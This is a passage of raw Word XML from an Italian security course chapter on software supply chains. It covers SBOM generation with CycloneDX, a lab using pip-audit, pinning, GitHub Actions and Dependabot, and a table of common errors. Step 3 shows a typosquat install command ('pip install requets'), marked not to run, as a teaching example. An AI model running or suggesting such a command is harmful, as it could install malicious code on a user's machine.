        <w:t xml:space="preserve">(npm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@azienda/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) registrati sul registro pubblico per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">occupare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il nome.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="400"/>
    <w:bookmarkEnd w:id="401"/>
    <w:bookmarkStart w:id="403" w:name="sbom-software-bill-of-materials"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="559" w:name="sec_9_7"/>
      <w:r>
        <w:t xml:space="preserve">9.7 SBOM — Software Bill of Materials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="559"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Resilience Act</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) imporrà dal 2027 a chi vende software nell’UE di fornire una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SBOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la lista completa di tutti i componenti software del prodotto, con versioni e licenze.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’analogia è l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">etichetta degli ingredienti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sui prodotti alimentari. Devi sapere cosa stai mangiando. Devi sapere cosa stai installando.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="402" w:name="generare-una-sbom-in-formato-standard"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generare una SBOM in formato standard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo standard più diffuso è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CycloneDX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per Python:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install cyclonedx-bom</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cyclonedx-py -o sbom.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Genera un file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sbom.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che elenca tutte le dipendenze del progetto, le loro versioni, le licenze, gli hash. Esempio (estratto):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"bomFormat"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"CycloneDX"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>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"components"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"library"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"Flask"</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"3.0.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"licenses"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"license"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"BSD-3-Clause"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"purl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"pkg:pypi/flask@3.0.0"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La SBOM viene allegata al rilascio del software. Strumenti specifici (Dependency-Track) la importano in continuo, e quando esce un nuovo CVE che riguarda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">una qualunque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delle dipendenze nella SBOM, allertano automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’alternativa principale a CycloneDX è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SPDX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Software Package Data Exchange), formato Linux Foundation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="402"/>
    <w:bookmarkEnd w:id="403"/>
    <w:bookmarkStart w:id="409" w:name="X54b8821a01b2f706dd746ef71ff40a0be093f70"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="560" w:name="sec_9_8"/>
      <w:r>
        <w:t xml:space="preserve">9.8 Laboratorio: gestione supply chain di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="560"/>
    </w:p>
    <w:bookmarkStart w:id="404" w:name="step-1-audit-del-progetto-attuale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Audit del progetto attuale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza/bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con ambiente virtuale attivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Probabilmente non vedi vulnerabilità (Flask + bcrypt sono librerie aggiornate). Bene.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="404"/>
    <w:bookmarkStart w:id="405" w:name="step-2-generiamo-requirements.txt-e-sbom"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Generiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e SBOM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Salva l’elenco delle dipendenze attuali:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip freeze &gt; requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vedrai qualcosa tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt==4.2.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blinker==1.8.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">click==8.1.7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask==3.0.3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">itsdangerous==2.2.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2==3.1.4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MarkupSafe==2.1.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Werkzeug==3.0.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Genera la SBOM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install cyclonedx-bom</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cyclonedx-py environment -o sbom.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sbom.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con VS Code. Vedi tutte le librerie del progetto, con versioni e licenze.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Questo file è quello che dal 2027 dovrai allegare a ogni rilascio di software venduto nell’UE.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="405"/>
    <w:bookmarkStart w:id="406" w:name="X6a1cb40e7699f184d79ecfc218ad8c98cd3f3e9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Simulazione di un’installazione di typosquat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NON ESEGUIRE QUESTO PASSAGGIO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Solo lettura. Se davvero esistesse un pacchetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># NON eseguire</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install requets   # invece di "requests" — typo intenzionale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PyPI rimuove rapidamente i typosquat ma alcuni vivono ore o giorni prima della rimozione. Durante quel tempo possono compromettere chiunque sbagli a digitare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa concreta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: prima di ogni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di un pacchetto nuovo, verifica:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La pagina PyPI ufficiale (</w:t>
      </w:r>
      <w:hyperlink r:id="rId59">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pypi.org/project/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;nome&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Numero di download recenti (pip-stats, libraries.io)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data di prima pubblicazione (se è recente, attenzione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Repository GitHub linkato (esiste? è attivo? ha stelle?)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="406"/>
    <w:bookmarkStart w:id="407" w:name="step-4-configurazione-github-actions"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 — Configurazione GitHub Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/security.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(vedi </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_9_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§9.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Quando farai push, GitHub eseguirà l’audit automaticamente. Ogni PR mostrerà se introduce vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="407"/>
    <w:bookmarkStart w:id="408" w:name="step-5-configurazione-dependabot"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5 — Configurazione Dependabot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(vedi </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_9_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§9.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Da quel momento in poi, Dependabot ti aprirà automaticamente PR per gli aggiornamenti di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="408"/>
    <w:bookmarkEnd w:id="409"/>
    <w:bookmarkStart w:id="410" w:name="errori-comuni-in-produzione-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="sec_9_9"/>
      <w:r>
        <w:t xml:space="preserve">9.9 Errori comuni in produzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="561"/>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rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requirements.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con versioni</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">fluide</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">flask</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">senza</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">==</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Build non riproducibili, librerie sostituite a sorpresa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pinning preciso (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">flask==3.0.3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requirements.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con versioni pinnate ma mai aggiornate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accumulo di CVE per anni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip-audit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">automatico in CI, Dependabot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nessuna scansione di sicurezza in CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vulnerabilità arrivano in produzione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip-audit --strict</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">come gate del merge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aggiornamenti applicati senza testare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Breaking change in produzione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Testing automatico + staging environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nessuna SBOM rilasciata col software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
